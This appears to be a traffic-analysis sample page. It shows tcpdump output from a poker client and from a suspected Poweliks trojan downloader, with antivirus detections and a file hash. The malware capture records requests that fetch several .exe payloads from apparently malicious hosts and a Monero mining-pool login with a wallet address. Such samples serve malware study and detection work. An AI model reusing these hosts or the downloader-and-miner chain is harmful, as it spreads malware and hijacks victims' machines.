BETONLINE.AG poker betonline.ag PCAP file download Traffic Analysis Sample

Betonline.ag poker site pcap traffic sample

 

2017-09-25 15:49:10.187283 IP 192.168.1.102.57820 > 75.75.75.75.53: 27634+ A? poker.betonline.ag. (36)
E..@.-………fKKKK…5.,[‘k…………poker betonline.ag…..
2017-09-25 15:49:12.457700 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 1454268158:1454268182, ack 2127766518, win 32458, length 24
E..@T.@…)….f2..h…2V.^.~.#.P.~..F…0………………….
2017-09-25 15:49:12.589103 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 25, win 32452, length 0
E..(T.@…)….f2..h…2V._.~.$.P.~………..
2017-09-25 15:49:47.366759 IP 192.168.1.102.49487 > 75.75.75.75.53: 8606+ A? www.google-analytics.com. (42)
E..F………..fKKKK.O.5.2.;!…………www.google-analytics.com…..
2017-09-25 15:49:49.584408 IP 192.168.1.102.52369 > 75.75.75.75.53: 10203+ A? poker.tigergaming.com. (39)
E..C./………fKKKK…5./D.’…………poker.tigergaming.com…..
2017-09-25 15:49:49.615175 IP 192.168.1.102.52369 > 75.75.76.76.53: 10203+ A? poker.tigergaming.com. (39)
E..C<……….fKKLL…5./C.’…………poker.tigergaming.com…..
2017-09-25 15:50:07.611927 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 24:48, ack 25, win 32452, length 24
E..@T.@…)….f2..h…2V._.~.$.P.~……0………………….
2017-09-25 15:50:07.728399 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 49, win 32446, length 0
E..(T.@…)….f2..h…2V._.~.$&P.~..b……..
2017-09-25 15:50:08.575969 IP 192.168.1.102.55489 > 75.75.75.75.53: 11174+ A? client-cf.dropbox.com. (39)
E..C.1………fKKKK…5./ .+……….. client-cf.dropbox.com…..
2017-09-25 15:51:02.698632 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 48:72, ack 49, win 32446, length 24
E..@T.@…)….f2..h…2V._.~.$&P.~……0………………….
2017-09-25 15:51:02.814051 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 73, win 32440, length 0
E..(T.@…)….f2..h…2V._F~.$>P.~..8……..
2017-09-25 15:51:17.250346 IP 192.168.1.102.50604 > 75.75.75.75.53: 7567+ A? ipcast1.dynupdate.noip.com. (44)
E..H.2………fKKKK…5.4……………ipcast1 dynupdate.noip.com…..
2017-09-25 15:51:57.784824 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 72:96, ack 73, win 32440, length 24
E..@T.@…)….f2..h…2V._F~.$>P.~……0………………….
2017-09-25 15:51:57.899186 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 97, win 32434, length 0
E..(T.@…)….f2..h…2V._^~.$VP.~………..
2017-09-25 15:52:52.873056 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 96:120, ack 97, win 32434, length 24
E..@T.@…)….f2..h…2V._^~.$VP.~……0………………….
2017-09-25 15:52:52.988402 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 121, win 32428, length 0
E..(T.@…)….f2..h…2V._v~.$nP.~………..
2017-09-25 15:53:47.959655 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 120:144, ack 121, win 32428, length 24
E..@T.@…)….f2..h…2V._v~.$nP.~..t…0………………….
2017-09-25 15:53:48.074117 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 145, win 32422, length 0
E..(T.@…)….f2..h…2V._.~.$.P.~………..
2017-09-25 15:54:43.048410 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [P.], seq 144:168, ack 145, win 32422, length 24
E..@T.@…)….f2..h…2V._.~.$.P.~..J…0………………….
2017-09-25 15:54:43.164776 IP 192.168.1.102.49694 > 50.22.136.104.5938: Flags [.], ack 169, win 32416, length 0
E..(T.@…)….f2..h…2V._.~.$.P.~………..
~
~
~
~

Possible Poweliks Variant Trojan Malware Adware Pay-per-Download Bitcoin Cryptocurrency PCAP file download traffic sample

 

ESET-NOD32 NSIS/TrojanDownloader.Agent.NVZ 20170703
Fortinet W32/Agent.NVS!tr.dldr 20170629
Invincea heuristic 20170607
Kaspersky Trojan.Win32.Poweliks.adbd 20170703
McAfee Artemis!DD96CB7EFE6D 20170703
McAfee-GW-Edition BehavesLike.Win32.Vopak.kc 20170703
Microsoft Trojan:Win32/Starter.P 20170703
Palo Alto Networks (Known Signatures) generic.ml 20170703
Qihoo-360 Win32/Trojan.1e3 20170703
Rising Adware.ConvertAd!1.A1B5 (cloud:zJ49DXPzuCC) 20170703
SentinelOne (Static ML) static engine – malicious 20170516
Sophos Mal/Generic-S 20170703
Tencent Nsis.Trojan-downloader.Agent.Wuqw 20170703
TrendMicro-HouseCall Suspicious_GEN.F47V0703 20170703
VBA32 suspected of Trojan.Downloader.gen.h 20170630
VIPRE Trojan.Win32.Generic!BT 20170703
ZoneAlarm by Check Point Trojan.Win32.Poweliks.adbd 20170703

 

SHA256: f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72
File name: lnk.php
Detection ratio: 25 / 61
Analysis date: 2017-07-03 21:51:38 UTC ( 0 minutes ago )

 

https://virustotal.com/en/file/f1877f0fd9bcaa4ee4498eb8f7c55cf2086313f2209caa18ef597898d2376e72/analysis/1499118698/

 

2017-07-03 15:34:00.193162 IP 192.168.1.102.60285 > 198.50.183.24.80: Flags [P.], seq 0:390, ack 1, win 256, length 390: HTTP: GET /lnk.php HTTP/1.1
E…-.@….0…f.2…}.P8@.
L.q.P…….GET /lnk.php HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: syska.gdn
Connection: Keep-Alive

2017-07-03 15:34:36.065319 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
E…pf@…(‘…f.P.a…J/. .b*z=P…….GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:36.366793 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 0:131, ack 1, win 256, length 131
E…pg@…(&…f.P.a…J/. .b*z=P…….GET /30.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:34:44.119376 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 131:262, ack 486923, win 256, length 131
E…q.@…’u…f.P.a…J/.!yb1.GP…D”..GET /20.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.011332 IP 192.168.1.102.60289 > 198.50.183.24.80: Flags [P.], seq 0:130, ack 1, win 256, length 130: HTTP: GET /nm/geoip.php HTTP/1.1
E…-.@……..f.2…..Py&..T.|PP….>..GET /nm/geoip.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cydro.gdn
Connection: Keep-Alive
Cache-Control: no-cache

2017-07-03 15:34:56.067684 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 262:392, ack 1511166, win 255, length 130
E…r?@…&O…f.P.a…J/.!.bA.:P….Z..GET /7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:35:07.289892 IP 192.168.1.102.60288 > 151.80.8.97.5450: Flags [P.], seq 392:523, ack 2443112, win 256, length 131
E…s-@…%`…f.P.a…J/.”~bO..P…d…GET /45.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 151.80.8.97:5450
Connection: Keep-Alive
Cache-Control: no-cache

 

2017-07-03 15:35:13.808692 IP 192.168.1.102.60839 > 75.75.75.75.53: 1813+ A? xmr.crypto-pool.fr. (36)
E..@c…..~….fKKKK…5.,.Q………….xmr.crypto-pool.fr…..
2017-07-03 15:35:14.095181 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [S], seq 3285038852, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..46’@……..f.S.)…
………. ..%…………..
2017-07-03 15:35:14.199441 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 203640344, win 256, length 0
E..(6(@……..f.S.)…
…..#N.P………….
2017-07-03 15:35:14.201398 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [P.], seq 0:197, ack 1, win 256, length 197
E…6)@….V…f.S.)…
…..#N.P….v..{“method”: “login”, “params”: {“login”: “49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY”, “pass”: “x”, “agent”: “cpuminer-multi/1.2-dev”}, “id”: 1}

2017-07-03 15:35:14.438781 IP 192.168.1.102.60290 > 212.83.168.41.6666: Flags [.], ack 304, win 255, length 0
E..(6*@……..f.S.)…
…..#OGP………….
2017-07-03 15:35:15.212929 IP 192.168.1.102.60840 > 75.75.75.75.53: 41488+ A? nottotrack.com. (32)
E..<c ….~….fKKKK…5.(.m…………
nottotrack.com…..
2017-07-03 15:35:15.319740 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [S], seq 1077723448, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.6@….V…f..`”…P@<.8…… .w……………
2017-07-03 15:35:15.420292 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [.], ack 550699079, win 256, length 0
E..(.7@….a…f..`”…P@<.9 ..GP….8……..
2017-07-03 15:35:15.427728 IP 192.168.1.102.60291 > 200.7.96.34.80: Flags [P.], seq 0:106, ack 1, win 256, length 106: HTTP: GET /proxy/get_build.php HTTP/1.0
E….8@……..f..`”…P@<.9 ..GP…….GET /proxy/get_build.php HTTP/1.0
Host: nottotrack.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*

2017-07-03 15:37:05.377167 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4464826, win 5446, length 0
E..(j)@….n…f..`”.i..(8j.Gz..P..F3}……..
2017-07-03 15:37:05.378957 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4469206, win 5446, length 0
E..(j*@….m…f..`”.i..(8j.Gz..P..F”a……..
2017-07-03 15:37:05.380518 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4473586, win 5446, length 0
E..(j+@….l…f..`”.i..(8j.Gz.8P..F.E……..
2017-07-03 15:37:05.381921 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4477966, win 5446, length 0
E..(j,@….k…f..`”.i..(8j.Gz.TP..F.)……..
2017-07-03 15:37:05.382248 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4479426, win 5446, length 0
E..(j-@….j…f..`”.i..(8j.Gz..P..F.t……..
2017-07-03 15:37:05.385510 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4491106, win 5417, length 0
E..(j.@….i…f..`”.i..(8j.G{..P..)……….
2017-07-03 15:37:05.388535 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4501326, win 5417, length 0
E..(j/@….h…f..`”.i..(8j.G{C.P..)……….
2017-07-03 15:37:05.397221 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4515926, win 5383, length 0
E..(j0@….g…f..`”.i..(8j.G{|.P…l………
2017-07-03 15:37:05.397349 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4530526, win 5383, length 0
E..(j1@….f…f..`”.i..(8j.G{..P…3………
2017-07-03 15:37:05.397356 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4531986, win 5383, length 0
E..(j2@….e…f..`”.i..(8j.G{.XP…-c……..
2017-07-03 15:37:05.401019 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4543666, win 5366, length 0
E..(j3@….d…f..`”.i..(8j.G{..P………….
2017-07-03 15:37:05.407107 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4558266, win 5366, length 0
E..(j4@….c…f..`”.i..(8j.G|”.P………….
2017-07-03 15:37:05.407261 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4565566, win 5366, length 0
E..(j5@….b…f..`”.i..(8j.G|>.P….G……..
2017-07-03 15:37:05.412163 IP 192.168.1.102.60521 > 200.7.96.34.443: Flags [.], ack 4578706, win 5355, length 0
E..(j6@….a…f..`”.i..(8j.G|q.P…v………